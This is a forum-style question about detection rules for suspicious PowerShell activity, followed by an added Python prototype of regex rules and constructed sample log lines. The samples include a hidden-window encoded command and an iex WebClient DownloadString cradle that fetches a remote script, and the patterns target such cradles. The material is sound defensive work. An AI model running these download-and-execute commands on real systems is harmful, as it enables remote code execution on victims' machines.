I was wondering what folks' favorite looking-for-evil rules are. In particular, I was wondering if folks have written any rules along the following lines:

- Detection of base64 encoding
- PowerShell command execution
- Running of System.Management.Automation.ni.dll (PowerShell DLL, I think)
- PowerShell JEA modifications and process changes
- Use of iex(New-Object Net.WebClient)
- Execution of downloaded code through the PS browser (it's rare to legitimately download code using the PowerShell browser?)
- Commands with a length greater than 500

Thanks!
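Added here as a worked illustration, not code from the original post or from OSSEC: a Python prototype of the matching logic behind several of the rule ideas listed above (encoded commands, the iex/WebClient download cradle, hidden windows, the Automation DLL image load and the 500-character length check), run over constructed sample log lines. The rule names, the log-line layout and the patterns are assumptions; each regex is the kind of expression one would carry over into an OSSEC rule.

```python
import base64
import re

MAX_CMD_LEN = 500  # the "longer than 500 characters" threshold from the post

# Assumed rule names and patterns (PCRE); none of these are OSSEC's own rules.
RULES = [
    ("ps_encoded_command", re.compile(r"-(?:encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("ps_download_cradle", re.compile(r"iex\s*\(\s*New-Object\s+Net\.WebClient\s*\)", re.I)),
    ("ps_downloadstring", re.compile(r"\.Download(?:String|File)\s*\(", re.I)),
    ("ps_hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("ps_automation_dll_load", re.compile(r"System\.Management\.Automation(?:\.ni)?\.dll", re.I)),
]
ENCODED_BLOB = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{20,})", re.I)
PS_INDICATOR = re.compile(r"\bpowershell(?:\.exe)?\b|\bpwsh\b|System\.Management\.Automation", re.I)


def decode_encoded_command(line):
    """Return the UTF-16LE plaintext of a -EncodedCommand blob, or None."""
    m = ENCODED_BLOB.search(line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # not valid base64 / not UTF-16
        return None


def evaluate(line):
    """Return the names of every rule that fires on one log line."""
    if not PS_INDICATOR.search(line):  # cheap pre-filter, like an OSSEC parent rule
        return []
    hits = [name for name, rx in RULES if rx.search(line)]
    decoded = decode_encoded_command(line)
    if decoded:  # re-run the content rules on the decoded payload
        hits += [name + "(decoded)" for name, rx in RULES
                 if name != "ps_encoded_command" and rx.search(decoded)]
    if len(line) > MAX_CMD_LEN:
        hits.append("ps_long_command")
    return hits


# Constructed sample lines, loosely modelled on process-creation and image-load events.
ENCODED = base64.b64encode("IEX (New-Object Net.WebClient)".encode("utf-16le")).decode()
SAMPLE_LOGS = [
    "CommandLine: powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED,
    "CommandLine: powershell.exe -c \"iex(New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')\"",
    "CommandLine: powershell.exe Get-ChildItem C:\\Users",
    'CommandLine: powershell.exe -Command "' + "A" * 600 + '"',
    "ImageLoaded: C:\\Windows\\assembly\\NativeImages\\System.Management.Automation.ni.dll Image: C:\\Users\\Public\\updater.exe",
]
```

Decoding the -EncodedCommand blob before matching is what lets the cradle hidden in the first sample line fire; a rule that only inspects the raw command line would see nothing but base64.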
